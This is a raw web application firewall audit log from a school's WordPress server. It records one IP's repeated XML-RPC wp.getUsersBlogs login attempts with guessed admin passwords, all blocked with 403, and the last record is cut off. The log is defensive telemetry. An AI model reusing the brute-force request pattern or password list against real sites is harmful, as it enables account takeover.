[line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866988070008 6060 (- - -) Stopwatch2: 1749866988070008 6060; combined=4207, p1=554, p2=3480, p3=0, p4=0, p5=102, sr=100, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1208334-Z-- --ce17ce27-A-- [14/Jun/2025:09:10:50 +0700] aEzaKmmwZ6YUkjOdtI7FvAAAABQ 103.236.140.4 37032 103.236.140.4 8181 --ce17ce27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce17ce27-C-- wp.getUsersBlogs kasubagtu abc123!@# --ce17ce27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce17ce27-E-- --ce17ce27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867050422818 5324 (- - -) Stopwatch2: 1749867050422818 5324; combined=3723, p1=477, p2=3064, p3=0, p4=0, p5=106, sr=100, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce17ce27-Z-- --04e37527-A-- [14/Jun/2025:09:11:50 +0700] aEzaZmIDXuKmWNi2UBS2igAAAEI 103.236.140.4 37176 103.236.140.4 8181 --04e37527-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --04e37527-C-- wp.getUsersBlogs kasubagtu 1236 --04e37527-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04e37527-E-- --04e37527-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867110892781 4927 (- - -) Stopwatch2: 1749867110892781 4927; combined=3342, p1=419, p2=2749, p3=0, p4=0, p5=100, sr=83, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04e37527-Z-- --f4bf0946-A-- [14/Jun/2025:09:11:56 +0700] aEzabF3g_boun6Rx5jLRogAAANY 103.236.140.4 37202 103.236.140.4 8181 --f4bf0946-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4bf0946-C-- wp.getUsersBlogs kasubagtu 1234%^&* --f4bf0946-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4bf0946-E-- --f4bf0946-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867116242972 4060 (- - -) Stopwatch2: 1749867116242972 4060; combined=3118, p1=341, p2=2601, p3=0, p4=0, p5=102, sr=72, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4bf0946-Z-- --89022f1c-A-- [14/Jun/2025:09:12:53 +0700] aEzapWmwZ6YUkjOdtI7F9QAAAAo 103.236.140.4 37316 103.236.140.4 8181 --89022f1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --89022f1c-C-- wp.getUsersBlogs kasubagtu hello123 --89022f1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89022f1c-E-- --89022f1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867173256285 5429 (- - -) Stopwatch2: 1749867173256285 5429; combined=3873, p1=420, p2=3159, p3=0, p4=0, p5=205, sr=83, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89022f1c-Z-- --2012684c-A-- [14/Jun/2025:09:13:53 +0700] aEza4V3g_boun6Rx5jLRyQAAAMs 103.236.140.4 37406 103.236.140.4 8181 --2012684c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2012684c-C-- wp.getUsersBlogs kasubagtu cheese --2012684c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2012684c-E-- --2012684c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867233855315 4781 (- - -) Stopwatch2: 1749867233855315 4781; combined=3489, p1=362, p2=2931, p3=0, p4=0, p5=111, sr=81, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2012684c-Z-- --6b428810-A-- [14/Jun/2025:09:14:55 +0700] aEzbH2mwZ6YUkjOdtI7GJAAAAAk 103.236.140.4 37534 103.236.140.4 8181 --6b428810-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6b428810-C-- wp.getUsersBlogs kasubagtu hellokitty --6b428810-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b428810-E-- --6b428810-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867295027721 4925 (- - -) Stopwatch2: 1749867295027721 4925; combined=3664, p1=406, p2=3030, p3=0, p4=0, p5=157, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b428810-Z-- --c245310b-A-- [14/Jun/2025:09:16:00 +0700] aEzbYGmwZ6YUkjOdtI7GfgAAAAY 103.236.140.4 37780 103.236.140.4 8181 --c245310b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c245310b-C-- wp.getUsersBlogs kasubagtu dallas --c245310b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c245310b-E-- --c245310b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (120+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867360125650 5401 (- - -) Stopwatch2: 1749867360125650 5401; combined=3795, p1=462, p2=3147, p3=0, p4=0, p5=108, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c245310b-Z-- --699ab444-A-- [14/Jun/2025:09:17:07 +0700] aEzbo2IDXuKmWNi2UBS2lgAAAE8 103.236.140.4 37938 103.236.140.4 8181 --699ab444-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --699ab444-C-- wp.getUsersBlogs kasubagtu gerrard --699ab444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --699ab444-E-- --699ab444-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (77+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867427400955 6084 (- - -) Stopwatch2: 1749867427400955 6084; combined=4212, p1=563, p2=3472, p3=0, p4=0, p5=105, sr=116, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --699ab444-Z-- --efd4582a-A-- [14/Jun/2025:09:18:07 +0700] aEzb32mwZ6YUkjOdtI7G1AAAABU 103.236.140.4 38066 103.236.140.4 8181 --efd4582a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --efd4582a-C-- wp.getUsersBlogs administrator r007p455w0rd --efd4582a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efd4582a-E-- --efd4582a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867487317320 4508 (- - -) Stopwatch2: 1749867487317320 4508; combined=3332, p1=359, p2=2808, p3=0, p4=0, p5=97, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efd4582a-Z-- --24944b4d-A-- [14/Jun/2025:09:19:07 +0700] aEzcG2mwZ6YUkjOdtI7HGAAAAA8 103.236.140.4 38220 103.236.140.4 8181 --24944b4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --24944b4d-C-- wp.getUsersBlogs administrator administrator2006 --24944b4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24944b4d-E-- --24944b4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867547037621 4454 (- - -) Stopwatch2: 1749867547037621 4454; combined=3333, p1=340, p2=2807, p3=0, p4=0, p5=106, sr=77, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24944b4d-Z-- --48f72c51-A-- [14/Jun/2025:09:20:07 +0700] aEzcV2mwZ6YUkjOdtI7HcwAAAA4 103.236.140.4 38448 103.236.140.4 8181 --48f72c51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --48f72c51-C-- wp.getUsersBlogs administrator administrator@1986 --48f72c51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48f72c51-E-- --48f72c51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867607027013 5069 (- - -) Stopwatch2: 1749867607027013 5069; combined=3717, p1=431, p2=3116, p3=0, p4=0, p5=99, sr=106, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f72c51-Z-- --c256ba38-A-- [14/Jun/2025:09:21:10 +0700] aEzclmmwZ6YUkjOdtI7HpwAAABc 103.236.140.4 38560 103.236.140.4 8181 --c256ba38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c256ba38-C-- wp.getUsersBlogs administrator smkn22-jkt.sch888 --c256ba38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c256ba38-E-- --c256ba38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867670287695 5458 (- - -) Stopwatch2: 1749867670287695 5458; combined=3855, p1=489, p2=3196, p3=0, p4=0, p5=100, sr=92, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c256ba38-Z-- --68c03a58-A-- [14/Jun/2025:09:22:10 +0700] aEzc0mIDXuKmWNi2UBS2yAAAAEA 103.236.140.4 38704 103.236.140.4 8181 --68c03a58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --68c03a58-C-- wp.getUsersBlogs administrator 1234!@#$ --68c03a58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68c03a58-E-- --68c03a58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867730100410 4306 (- - -) Stopwatch2: 1749867730100410 4306; combined=3194, p1=351, p2=2681, p3=0, p4=0, p5=95, sr=82, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68c03a58-Z-- --7c9e2474-A-- [14/Jun/2025:09:23:17 +0700] aEzdFWmwZ6YUkjOdtI7HyAAAAAc 103.236.140.4 38872 103.236.140.4 8181 --7c9e2474-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7c9e2474-C-- wp.getUsersBlogs administrator test1 --7c9e2474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c9e2474-E-- --7c9e2474-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867797393073 5727 (- - -) Stopwatch2: 1749867797393073 5727; combined=3981, p1=500, p2=3305, p3=0, p4=0, p5=104, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c9e2474-Z-- --52566e15-A-- [14/Jun/2025:09:24:17 +0700] aEzdUV3g_boun6Rx5jLSWgAAAM8 103.236.140.4 39068 103.236.140.4 8181 --52566e15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --52566e15-C-- wp.getUsersBlogs administrator 11111111 --52566e15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52566e15-E-- --52566e15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (93+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749867857234513 6006 (- - -) Stopwatch2: 1749867857234513 6006; combined=4071, p1=515, p2=3384, p3=0, p4=0, p5=102, sr=94, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52566e15-Z-- --1529065c-A-- [14/Jun/2025:09:25:17 +0700] aEzdjWmwZ6YUkjOdtI7H_AAAABM 103.236.140.4 39148 103.236.140.4 8181 --1529065c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1529065c-C-- wp.getUsersBlogs administrator secret --1529065c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 